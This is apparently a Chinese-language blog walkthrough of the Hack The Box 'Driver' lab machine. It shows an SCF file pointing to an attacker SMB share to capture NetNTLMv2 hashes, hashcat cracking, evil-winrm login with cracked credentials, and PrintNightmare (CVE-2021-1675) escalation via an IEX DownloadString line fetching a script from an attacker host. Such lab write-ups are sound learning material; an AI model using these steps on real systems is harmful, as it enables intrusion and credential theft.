HTB Driver

使用nmap进行扫描

nmap -sV -sT -sC 10.10.11.106

可以看到开放了80、135、445端口,尝试在网站内找漏洞

20220215092740

WEB

直接访问需要输入账号密码,是弱密码为,账号密码为admin

20220215084115

测试发现这个网站只能上传文件到SMB,查找SMB漏洞,
这个网站还有别的SMB攻击方式

SMB Penetration Testing (Port 445)

找到SMB文件攻击
https://sql–injection.blogspot.com/p/smb.html

创建文件shell.scf,并上传

[Shell]

Command=2

IconFile=\\10.10.14.4\share\pentestlab.ico

[Taskbar]

Command=ToggleDesktop

终端接收数据

responder -wrf --lm -v -I tun0

获取NetNTLMv2

20220215103809

使用hashcat --example-hashes | less选择mode,5600

20220215104707

解密

hashcat -m 5600 ./1.txt /usr/share/wordlists/rockyou.txt --force

20220215110047

使用evil-winrm登陆,tony:liltony

evil-winrm -i 10.10.11.106 -u TONY -p liltony

20220215111806

获取第一个flag

20220215112044

ROOT

经过测试只能很多命令都没有权限,找到了个有漏洞的第三方服务,可以进行提权
使用get-process或者tasklist查看进程,这里tasklist没有权限

20220228202315

搜索到漏洞CVE-2021-1675,在github搜到ps1脚本,上传文件,然后加载失败
https://github.com/calebstewart/CVE-2021-1675

使用远程加载,本地开启http服务

20220228211921

然后靶机进行加载IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.43/CVE-2021-1675.ps1')

然后创建用户

20220228212031

使用用户登陆,确认权限

20220228212145

读取flag

20220228212221

暂无评论

发送评论 编辑评论


|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇